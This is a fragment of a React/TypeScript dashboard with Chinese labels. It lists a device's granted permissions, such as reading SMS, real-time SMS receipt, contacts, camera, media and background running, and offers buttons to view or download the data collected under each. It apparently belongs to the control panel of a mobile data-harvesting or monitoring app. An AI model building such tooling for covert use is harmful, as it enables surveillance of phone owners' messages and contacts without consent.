    downloadBase64File(item.data, name || `video_${index + 1}.mp4`, item.mime_type || 'video/mp4')
  } catch { window.alert('下载失败') }
}

function downloadBase64File(data: string, name: string, mime: string) {
  const link = document.createElement('a')
  link.href = `data:${mime};base64,${data}`
  link.download = name
  document.body.appendChild(link)
  link.click()
  document.body.removeChild(link)
  URL.revokeObjectURL(link.href)
}

function InfoCard({ title, value }: { title: string; value: React.ReactNode }) {
  return (<div className="bg-white rounded-lg shadow-sm border border-gray-200 p-4"><p className="text-sm font-medium text-gray-600">{title}</p><div className="mt-1 text-lg font-semibold text-gray-900">{value}</div></div>)
}

function InfoRow({ label, value, mono }: { label: string; value: string; mono?: boolean }) {
  return (<div className="flex justify-between"><span className="text-sm text-gray-600">{label}</span><span className={`text-sm font-medium text-gray-900 ${mono ? 'font-mono' : ''}`}>{value || '-'}</span></div>)
}

function PermissionRow({ label, granted, onView, onDownload }: { label: string; granted: boolean; onView: () => void; onDownload: () => void }) {
  const names: Record<string, string> = { camera: '相机', sms: '读取短信', sms_receive: '实时接收短信', contacts: '通讯录', album: '相册/存储', notification: '通知', battery: '电量', upload: '上传', media_images: '媒体图片', media_video: '媒体视频', media_audio: '媒体音频', background_run: '后台运行' }
  return (
    <div className="flex items-center justify-between">
      <span className="text-sm text-gray-600">{names[label] || label.replace(/_/g, ' ')}</span>
      <div className="flex items-center gap-2">
        <span className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${granted ? 'bg-green-100 text-green-800' : 'bg-red-100 text-red-800'}`}>{granted ? '已授权' : '未授权'}</span>
        {granted && <><button onClick={onView} className="text-xs text-indigo-600 hover:text-indigo-900">查看</button><button onClick={onDownload} className="text-xs text-indigo-600 hover:text-indigo-900">下载</button></>}
      </div>
    </div>
  )
}
